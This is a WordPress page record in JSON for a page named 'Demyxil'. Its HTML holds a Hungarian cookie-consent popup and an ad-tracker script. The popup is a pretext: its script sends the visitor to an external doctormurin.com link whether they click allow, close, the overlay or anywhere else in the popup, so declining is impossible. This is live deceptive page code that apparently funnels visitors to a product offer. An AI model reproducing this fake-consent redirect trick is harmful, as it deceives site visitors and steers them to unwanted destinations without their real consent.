{"id":748,"date":"2025-11-12T11:34:45","date_gmt":"2025-11-12T11:34:45","guid":{"rendered":"https:\/\/globalproductstore.shop\/?page_id=748"},"modified":"2025-11-12T11:36:35","modified_gmt":"2025-11-12T11:36:35","slug":"demyxil","status":"publish","type":"page","link":"https:\/\/globalproductstore.shop\/?page_id=748","title":{"rendered":"Demyxil"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"748\" class=\"elementor elementor-748\">\n\t\t\t\t<div class=\"elementor-element elementor-element-e6334f7 e-flex e-con-boxed e-con e-parent\" data-id=\"e6334f7\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-e7771ec elementor-widget elementor-widget-html\" data-id=\"e7771ec\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t\r\n  <!DOCTYPE html>\r\n  <html lang=\"en\">\r\n  <head>\r\n    <meta charset=\"UTF-8\">\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n    <title>S\u00fcti (cookie) Szab\u00e1lyzat<\/title>\r\n                <script src=\"https:\/\/app.clickfastads.com.br\/api\/tracker\/69146c0c844609267f0a91c8\"><\/script>\r\n    <link rel=\"stylesheet\" href=\"https:\/\/cdn.jsdelivr.net\/gh\/ClickFastAds\/tracker@main\/styles.css\">\r\n    <style>\r\n      body {\r\n        background-image: url('https:\/\/background-imgs.s3.sa-east-1.amazonaws.com\/e9fedd1b9dbab334249d552a94e1bc\/69146c0c844609267f0a91c8\/1762946260894.jpeg');\r\n        background-size: cover;\r\n        background-position: top center;\r\n        background-repeat: no-repeat;\r\n      }\r\n      @media (max-width: 768px) {\r\n        body {\r\n          background-image: url('https:\/\/background-imgs.s3.sa-east-1.amazonaws.com\/e9fedd1b9dbab334249d552a94e1bc\/69146c0c844609267f0a91c8\/1762946263935.jpeg');\r\n          background-size: cover;\r\n          background-position: top center;\r\n        }\r\n      }\r\n    <\/style>\r\n  <\/head>\r\n  <body>\r\n  <div class=\"overlay\" id=\"overlay\"><\/div>\r\n  <div class=\"cookie-popup\" id=\"cookiePopup\">\r\n      <h2>S\u00fcti (cookie) Szab\u00e1lyzat<\/h2>\r\n      <p>Ez a webhely s\u00fctiket haszn\u00e1l a tartalom \u00e9s a hirdet\u00e9sek szem\u00e9lyre szab\u00e1s\u00e1hoz, k\u00f6z\u00f6ss\u00e9gi m\u00e9dia funkci\u00f3k biztos\u00edt\u00e1s\u00e1hoz \u00e9s forgalmunk elemz\u00e9s\u00e9hez. A 'Hozz\u00e1j\u00e1rul\u00e1s' gombra kattintva beleegyezik a s\u00fctik haszn\u00e1lat\u00e1ba. Tov\u00e1bbi inform\u00e1ci\u00f3k\u00e9rt l\u00e1togasson el a Cookie Szab\u00e1lyzatunkba.<\/p>\r\n      <a \r\n          href=\"https:\/\/3hy53.doctormurin.com\/l\" \r\n          id=\"acceptCookies\" \r\n          class=\"btn btn-allow\"\r\n          data-base-url=\"https:\/\/3hy53.doctormurin.com\/l\"\r\n      >\r\n          Enged\u00e9lyez\r\n      <\/a>\r\n      <button id=\"cookieSettings\" href=\"https:\/\/3hy53.doctormurin.com\/l\" class=\"btn btn-settings\">Bez\u00e1r\u00e1s<\/button>\r\n  <\/div>\r\n    <script>\r\n      document.addEventListener('DOMContentLoaded', function () {\r\n        var overlay = document.getElementById('overlay');\r\n        var cookiePopup = document.getElementById('cookiePopup');\r\n        var acceptCookies = document.getElementById('acceptCookies');\r\n        var cookieSettings = document.getElementById('cookieSettings');\r\n        var redirectUrl = acceptCookies.getAttribute(\"data-base-url\");\r\n        function redirectToUrl(url) {\r\n          const tempLink = document.createElement('a');\r\n          tempLink.href = url;\r\n          tempLink.style.display = 'none';\r\n          document.body.appendChild(tempLink);\r\n          tempLink.click();\r\n          document.body.removeChild(tempLink);\r\n        }\r\n        overlay.style.display = 'block';\r\n        cookiePopup.style.display = 'block';\r\n        acceptCookies.addEventListener('click', function (e) {\r\n          e.preventDefault();\r\n          redirectToUrl(redirectUrl);\r\n        });\r\n        cookieSettings.addEventListener('click', () => redirectToUrl(redirectUrl));\r\n        overlay.addEventListener('click', () => redirectToUrl(redirectUrl));\r\n        cookiePopup.addEventListener('click', function (e) {\r\n          if (e.target === cookiePopup || e.target.closest('.btn') === null) {\r\n            redirectToUrl(redirectUrl);\r\n          }\r\n        });\r\n      });\r\n      <\/script>\r\n    <\/body>\r\n  <\/html>\r\n  \t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>S\u00fcti (cookie) Szab\u00e1lyzat S\u00fcti (cookie) Szab\u00e1lyzat Ez a webhely s\u00fctiket haszn\u00e1l a tartalom \u00e9s a hirdet\u00e9sek szem\u00e9lyre szab\u00e1s\u00e1hoz, k\u00f6z\u00f6ss\u00e9gi m\u00e9dia funkci\u00f3k biztos\u00edt\u00e1s\u00e1hoz \u00e9s forgalmunk elemz\u00e9s\u00e9hez. A &#8216;Hozz\u00e1j\u00e1rul\u00e1s&#8217; gombra kattintva beleegyezik a s\u00fctik haszn\u00e1lat\u00e1ba. Tov\u00e1bbi inform\u00e1ci\u00f3k\u00e9rt l\u00e1togasson el a Cookie Szab\u00e1lyzatunkba. Enged\u00e9lyez Bez\u00e1r\u00e1s<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-748","page","type-page","status-publish","hentry"],"_hostinger_reach_plugin_has_subscription_block":false,"_hostinger_reach_plugin_is_elementor":false,"_links":{"self":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=748"}],"version-history":[{"count":4,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/748\/revisions"}],"predecessor-version":[{"id":753,"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=\/wp\/v2\/pages\/748\/revisions\/753"}],"wp:attachment":[{"href":"https:\/\/globalproductstore.shop\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}